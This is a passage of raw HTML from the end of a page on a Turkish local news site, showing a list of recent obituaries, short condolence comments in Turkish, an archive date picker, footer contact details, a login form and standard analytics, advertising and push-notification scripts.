class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/hasim-tekdemir-h69041.html" title="" ><span class="en-hit">4.</span> <strong>Haşim Tekdemir</strong> <span class="en-spot en-hidden">Haşim Tekdemir</span></a></div></li> <li class="last en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/bayram-yildirim-67-yasinda-h69093.html" title="Bayram Yıldırım 67 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/01/bayram_yildirim_67_yasinda_h69093_8c505.jpg" alt="Bayram Yıldırım 67 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/bayram-yildirim-67-yasinda-h69093.html" title="" ><span class="en-hit">5.</span> <strong>Bayram Yıldırım 67 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li> </ul> </div> </div> </div> </div> </div> <!-- SON YORUMLAR --> <div class="sayfalar"> <div class="header"> <h5>Son Yorumlar</h5> </div> <div class="content"> <ul class="unstyled"> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/aysegul-memur-50-yasinda-h69212.html#comment_339503" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ayise-firik-78-yasinda-h69213.html#comment_339502" title="" >Allahrahmeteylesinmekanı Cennetolsun.yakınlarının...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ayise-firik-78-yasinda-h69213.html#comment_339501" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/aysegul-memur-50-yasinda-h69212.html#comment_339500" title="" >merhumeye Allah tan rahmet ailesi ve yakınlarına...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/tekin-cicek-51-yasinda-h69167.html#comment_339499" title="" >Allah rahmet etsin. Mekanı cennet olsun....</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/anma-osman-sacan-h69211.html#comment_339498" title="" >ALLAH RAHMET EYLESİN MEKANI CENNET OLSUN</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/aysegul-memur-50-yasinda-h69212.html#comment_339497" title="" >ALLAH RAHMET EYLESİN MEKANI CENNET OLSUN</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ayise-firik-78-yasinda-h69213.html#comment_339496" title="" >ALLAH RAHMET EYLESİN MEKANI CENNET OLSUN</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ayise-firik-78-yasinda-h69213.html#comment_339495" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/menderes-gok-56-yasinda-h69206.html#comment_339494" title="" >Yüceler yücesi Allah cc Gani Gani rahmet...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ilhami-gedikli-34-yasinda-h69192.html#comment_339493" title="" >Allah rahmet eylesin.Tüm yakınlarına...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/menderes-gok-56-yasinda-h69206.html#comment_339492" title="" >Allah rahmet eylesin mekani cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/menderes-gok-56-yasinda-h69206.html#comment_339491" title="" >Allah mekanını Cennet eylesin inşAllah...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ayise-firik-78-yasinda-h69213.html#comment_339490" title="" >ALLAH RAHMET EYLESİN</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/menderes-gok-56-yasinda-h69206.html#comment_339489" title="" >ALLAH RAHMET EYLESİN</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/menderes-gok-56-yasinda-h69206.html#comment_339488" title="" >Allahrahmet eylesin mekanı cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/anma-osman-sacan-h69211.html#comment_339487" title="" >Zamansız vefat etmiş olan Osman Saçan,a...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ayise-firik-78-yasinda-h69213.html#comment_339485" title="" >ALLAH RAHMET EYLESİN MEKANI CENNET OLSUN...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/menderes-gok-56-yasinda-h69206.html#comment_339484" title="" >ALLAH RAHMET EYLESİN MEKANI CENNET OLSUN....</a></li> <li class="last"><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ayise-firik-78-yasinda-h69213.html#comment_339483" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li> </ul> </div> </div> <!-- ARSIV --> <div class="arsiv"> <div class="header"> <h5>Arşiv</h5> </div> <div class="content"> <form action="http://www.elbistaninsesi.com/?m=arsiv" method="post" name="arsiv" > <select name="gun" class="day span1"> <option value="01" >01</option> <option value="02" >02</option> <option value="03" >03</option> <option value="04" >04</option> <option value="05" >05</option> <option value="06" >06</option> <option value="07" >07</option> <option value="08" >08</option> <option value="09" >09</option> <option value="10" >10</option> <option value="11" selected>11</option> <option value="12" >12</option> <option value="13" >13</option> <option value="14" >14</option> <option value="15" >15</option> <option value="16" >16</option> <option value="17" >17</option> <option value="18" >18</option> <option value="19" >19</option> <option value="20" >20</option> <option value="21" >21</option> <option value="22" >22</option> <option value="23" >23</option> <option value="24" >24</option> <option value="25" >25</option> <option value="26" >26</option> <option value="27" >27</option> <option value="28" >28</option> <option value="29" >29</option> <option value="30" >30</option> <option value="31" >31</option> </select> <select name="ay" class="month span1"> <option value="01" >Ocak</option> <option value="02" selected>Şubat</option> <option value="03" >Mart</option> <option value="04" >Nisan</option> <option value="05" >Mayıs</option> <option value="06" >Haziran</option> <option value="07" >Temmuz</option> <option value="08" >Ağustos</option> <option value="09" >Eylül</option> <option value="10" >Ekim</option> <option value="11" >Kasım</option> <option value="12" >Aralık</option> </select> <select name="yil" class="year span1"> <option value="2021" selected>2021</option> <option value="2020" >2020</option> <option value="2019" >2019</option> <option value="2018" >2018</option> <option value="2017" >2017</option> </select> <button type="submit" class="btn btn-default pull-right">Ara</button> </form> </div> </div> </div> </div> <!-- Sol Dikey Reklam --> <div class="reklam dikey sol" style="width:px;height:px;"> </div> <!-- Sağ Dikey Reklam --> <div class="reklam dikey sag ortala" style="width:px;height:px;"> <p style="width:160px;"><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- kaynarca --> <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-3633419220222736" data-ad-slot="5807534991" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></p> </div> </div> <!-- FOOTER --> <div id="siteFooter" class="footer"> <div class="row-fluid"> <div class="container center"> <div class="span4"> <div>Copyright © 2021 - Tüm hakları saklıdır.<br>Elbistanın Sesi</div> <div class="footer-social"> <a href="https://facebook.com/elbistaninsesi" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/facebook_circle-32.png" alt="FACEBOOK"></a> <a href="https://twitter.com/elbistaninsesi" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/twitter_circle-32.png" alt="TWITTER"></a> <a href="https://www.instagram.com/elbistaninsesi_/" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/ins-ico.png" width="32" height="32" /> <img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/google_circle-32.png" alt="GOOGLE PLUS"></a> <a href="http://www.elbistaninsesi.com/rss"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/rss_circle-32.png" alt="RSS"></a> </div> </div> <div class="span4 text-center"> <div class="footer-logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/Ysimsiz-1_1.jpg" alt="Elbistanlı çocuk, dağlık alanda ölü bulundu" /></a></div> </div> <div class="span4"> <p><center> 0 (344) 415 04 15 <br> <a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="fd98919f948e899c9394938e988e949a9c879889988e94bd9a909c9491d39e9290">[email&#160;protected]</a> <br>Kızılcaoba Mah. Kışla Cad. 19/1</center> </p> <p class="site-info glyphicons earphone">0 (344) 415 04 15</p> </div> </div> </div> <div id="footer-alt" class="row-fluid"> <div class="container center"> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/m/" class="footer-alt-mobil glyphicons iphone"><strong>Mobil</strong>Mobil siteyi görüntüleyin.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/kunye.html" class="footer-alt-reklam glyphicons global"><strong>Künye</strong>Künyeyi görüntüleyin.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/iletisim.html" class="footer-alt-iletisim glyphicons headset"><strong>İletişim</strong>Bize ulaşın.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="#" class="footer-alt-iletisim glyphicons embed_close"><strong>Sitene Ekle</strong>Güncel haberleri ekleyin.</a></div> </div> </div> </div> <div class="row-fluid"> <div class="container center"> <div class="span12 text-center"> <p>Bu sitede yayınlanan tüm materyalin her hakkı mahfuzdur. Kaynak gösterilse bile gazetemizin izni olmadan yayınlanamaz.</p> <p><a href="http://www.haber-sistemi.com" title="Haber Scripti">Haber Scripti</a> | <a href="http://www.tebilisim.com" title="TE Bilişim" target="_blank">TE Bilişim<br> </div> </div> </div> <div id="top" class="btn btn-inverse">Yukarı Çık</div> </div> <div id="uye" class="user modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Üye Girişi</h3> </div> <div class="modal-body"> <form class="form-horizontal" action="http://www.elbistaninsesi.com/index.php?m=login&rd=http%3A%2F%2Fwww.elbistaninsesi.com%2Fguncel%2Felbistanli-cocuk-daglik-alanda-olu-bulundu-h69216.html" method="post"> <div class="control-group"> <label class="control-label" for="inputName">Kullanıcı Adı</label> <div class="controls"> <input id="inputName" value="" name="kullanici" type="text" placeholder="Kullanıcı Adı" required> </div> </div> <div class="control-group"> <label class="control-label" for="inputPassword">Şifre</label> <div class="controls"> <input type="password" value="" name="sifre" id="inputPassword" placeholder="Şifre" required> </div> </div> <div class="control-group"> <div class="controls"> <button type="submit" class="btn btn-info">Giriş Yap</button> </div> </div> </form> </div> <div class="modal-footer"> <a href="http://www.elbistaninsesi.com/uyelik.html" class="pull-left btn">Üye Ol</a> <a href="http://www.elbistaninsesi.com/unuttum.html" class="pull-left btn">Şifremi unuttum?</a> <button class="btn btn-danger" data-dismiss="modal" aria-hidden="true">Kapat</button> </div> </div> <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery-1.9.1.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/modernizr.custom.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/classie.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/uisearch.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/login.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.showbizpro.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cookie.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.mousewheel.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.scrollbar.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cycle.all.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/base.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/waypoints.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/sticky.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/comments.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.pKisalt.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/getshares.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment-tr.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.elevateZoom-3.0.8.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/system-min.js"></script> <script type="text/javascript">	new UISearch( document.getElementById( 'sb-search' ) );	$(function(){	});	$("#comment_list .text").pKisalt();	var gsTitle = document.querySelectorAll(".gs-title")[0].innerHTML;	var gsSpace = ' ';	var gsUrl = location.href;	new GetShare({ root: $(".gs-facebook"), network: "facebook", share: { }	});	new GetShare({ root: $(".gs-twitter"), network: "twitter", share: { message:gsTitle+gsSpace+gsUrl }	});	new GetShare({ root: $(".gs-google"), network: "googleplus", share: { }	});	new GetShare({ root: $(".gs-linkedin"), network: "linkedin", share: { }	});	jQuery('#anasayfayazar').showbizpro({	allEntryAtOnce:"on",	dragAndScroll:"off",	visibleElementsArray:[4,4,4,4],	carousel:"off",	heightOffsetBottom:0,	rewindFromEnd:"off",	autoPlay:"off",	delay:4000,	speed:750	});	jQuery('#gununmansetleri').showbizpro({	allEntryAtOnce:"on",	dragAndScroll:"off",	visibleElementsArray:[6,6,6,6],	carousel:"off",	heightOffsetBottom:0,	rewindFromEnd:"off",	autoPlay:"on",	delay:4000,	speed:750	});	$('#haber > .page-header').waypoint(function(direction) { $('#article-finished').toggleClass('hiding', direction === "up");	}, { offset: function() { return $.waypoints('viewportHeight') - $(this).height() - 750; }	});	function addLink() { var kisa_site_adi = "Elbistanın Sesi"; var kopyala_imza_onu = "Kaynak: http://www.elbistaninsesi.com"; var body_element = document.getElementsByTagName('body')[0]; var selection; selection = window.getSelection(); var pagelink = "<br><br>" + kopyala_imza_onu + "<a href='"+document.location.href+"'>"+document.location.href+"</a><br><br>" + kisa_site_adi; var copytext = selection + pagelink; var newdiv = document.createElement('div'); newdiv.style.position='absolute'; newdiv.style.left='-99999px'; body_element.appendChild(newdiv); newdiv.innerHTML = copytext; selection.selectAllChildren(newdiv); window.setTimeout(function() { body_element.removeChild(newdiv); },0);	}	document.oncopy = addLink;	tebilisim('69216', 'haber', ''); </script> <!-- Google Analytics --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', analitik_ga, 'auto'); ga('send', 'pageview'); </script> <!-- End Google Analytics --> <script src="https://cdn.onesignal.com/sdks/OneSignalSDK.js" async='async'></script> <script> var OneSignal = window.OneSignal || [];	OneSignal.push(["init", {	appId: "51fe1034-635b-4e70-859b-1fc8dff5f28d",	autoRegister: true,	subdomainName: 'elbistaninsesi',	setDefaultNotificationUrl: 'http://www.elbistaninsesi.com/',	notifyButton: { enable: false	},	/*	welcomeNotification: { "title": "Hoş geldiniz", "message": "Bildirimlerimize üye olduğunuz teşekkür ederiz.",	},	*/ promptOptions: { actionMessage: "Sondakika haberlerimizi anında öğrenebilmek için bildirimleri kabul edin!", acceptButtonText: "ABONE OL", cancelButtonText: "İSTEMİYORUM", autoAcceptTitle: '"İzin ver" butonuna tıklayın', exampleNotificationCaption: '(istediğin zaman aboneliğini iptal edebilirsin)', } }]); </script> </body> </html> 